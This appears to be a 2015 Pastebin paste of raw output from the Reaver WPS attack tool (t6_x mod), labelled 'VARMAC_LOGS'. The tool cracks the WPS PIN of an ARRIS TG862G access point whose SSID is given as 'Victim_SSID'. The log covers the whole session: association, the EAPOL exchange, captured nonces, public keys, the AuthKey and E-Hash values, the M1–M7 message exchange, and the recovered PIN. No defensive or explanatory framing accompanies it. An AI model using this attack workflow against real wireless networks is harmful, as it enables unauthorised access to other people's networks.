Advertisement
Guest User

Varmacscan

a guest
Nov 29th, 2015
461
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.12 KB | None | 0 0
  1. VARMAC_LOGS
  2. -----------
  3.  
  4. Reaver v1.5.2 WiFi Protected Setup Attack Tool
  5. Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
  6. mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212
  7.  
  8. [+] Switching wlan0mon to channel 3
  9. [+] Waiting for beacon from XX:XX:XX:XX:XX:XX
  10. [+] Associated with XX:XX:XX:XX:XX:XX (ESSID: Victim_SSID)
  11. [+] Starting Cracking Session. Pin count: 10000, Max pin attempts: 11000
  12. [+] Trying pin 20863463.
  13. [+] Sending EAPOL START request
  14. [+] Received identity request
  15. [+] Sending identity response
  16. [+] Received identity request
  17. [+] Sending identity response
  18. [+] Received identity request
  19. [+] Sending identity response
  20. [+] Received identity request
  21. [+] Sending identity response
  22. [+] Received identity request
  23. [+] Sending identity response
  24. [P] E-Nonce: 7b:53:e6:cd:eb:ea:e5:70:9f:96:cd:fa:50:9b:b4:c1
  25. [P] PKE: 2b:8b:f7:c5:85:ef:fa:7b:f7:30:16:34:ae:ff:c2:b4:28:3f:c0:48:10:b5:06:bd:cb:3c:75:9c:99:68:45:94:f6:50:9a:21:b4:b7:d5:6d:19:6d:20:cd:ff:23:fa:dc:d2:2a:24:2e:ed:2f:55:df:0e:62:be:cf:a5:f0:e3:47:f6:65:7b:f8:d4:be:25:0f:35:29:48:4d:2b:36:c2:35:b9:1e:da:f5:0c:ee:ba:b7:28:4b:8c:1a:cb:70:d7:96:db:13:c9:7b:1d:2a:a1:7e:19:9d:c9:2c:ce:f0:b0:18:83:51:2e:8d:49:09:e7:cb:f1:23:1e:48:f8:86:73:7f:8d:5e:6c:b2:58:e0:11:62:8f:c8:99:7d:4a:6a:a9:53:1c:51:0c:f4:48:ca:ac:dd:56:e9:4c:44:85:9b:01:62:ad:9c:16:14:5a:59:52:3b:87:38:e1:11:a7:fb:71:c8:9d:7a:99:19:b7:22:a1:53:1f:c1:10:3f:4c:44:1f:53
  26. [P] WPS Manufacturer: ARRIS
  27. [P] WPS Model Name: TG862G
  28. [P] WPS Model Number: RT2860
  29. [P] Access Point Serial Number: 12345678
  30. [+] Received M1 message
  31. [P] R-Nonce: 69:62:45:8b:34:0a:8a:bb:ae:26:7c:e2:50:7a:c9:b7
  32. [P] PKR: 60:bf:34:97:76:d6:ee:a5:cf:69:45:26:fe:dc:8a:c1:6a:87:26:b9:c7:63:15:51:d1:5c:f5:dd:db:c3:f4:8c:b9:42:b8:52:61:5c:2f:0f:dd:a0:24:94:1e:52:8d:12:2c:86:4b:fb:91:95:9a:1c:23:e3:5e:af:19:4b:b6:77:2b:8d:f3:58:2d:ad:45:19:e8:2c:60:7d:c9:39:ab:ea:4b:64:92:43:42:f4:c2:ff:4a:91:5a:d2:7b:f4:60:d3:66:f4:a3:26:75:ed:35:f4:00:82:b9:e9:b8:32:45:15:f0:35:e3:e0:41:1d:43:d3:69:b1:cb:2d:7c:bc:2b:5e:c7:20:56:66:62:d2:1a:8e:e6:71:7c:d5:88:57:3d:d0:e4:c9:ba:2b:bf:d1:98:29:6f:77:ba:0d:ee:7b:22:64:c7:6f:d5:e2:fc:89:11:54:78:f7:9f:90:00:e5:02:95:c4:99:bc:ad:ab:b4:32:09:55:8c:2b:14:6e:53:c6:e0
  33. [P] AuthKey: 0c:11:66:9d:22:ba:9a:92:3f:a4:13:c3:e1:6e:42:0f:23:a3:a5:16:91:1e:2f:e8:74:bb:33:2f:c1:83:55:eb
  34. [+] Sending M2 message
  35. [P] E-Hash1: d6:23:e5:ae:30:c5:78:a1:bd:aa:ce:ac:f3:fa:e3:6c:43:ea:bf:79:3d:ee:51:93:c5:74:dc:c5:2f:8a:e7:62
  36. [P] E-Hash2: 2d:2f:15:16:e5:55:7e:2e:34:0b:c5:ce:9f:f4:f3:2a:74:66:53:6b:c9:6f:85:dd:ba:ee:45:ff:4e:0d:f2:ea
  37. [+] Received M3 message
  38. [+] Sending M4 message
  39. [+] Received M3 message
  40. [+] Received M3 message
  41. [+] Received M3 message
  42. [+] Received M5 message
  43. [+] Sending M6 message
  44. [+] Received M5 message
  45. [+] Received M5 message
  46. [+] Received M5 message
  47. [+] Received M5 message
  48. [+] Received M5 message
  49. [+] Received M7 message
  50. [+] Sending WSC NACK
  51. [+] Sending WSC NACK
  52. [+] Pin cracked in 9 seconds
  53. [+] WPS PIN: '20863463'
  54. [+] Nothing done, nothing to save.
  55.  
  56. VARMAC_WPSWPA
  57.  
  58. WPS Pin: = '20863463'
  59. WPA Key: =
  60. AP SSID: =
  61.  
  62. Note WPA Key is found between the two(2) tick symbols
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement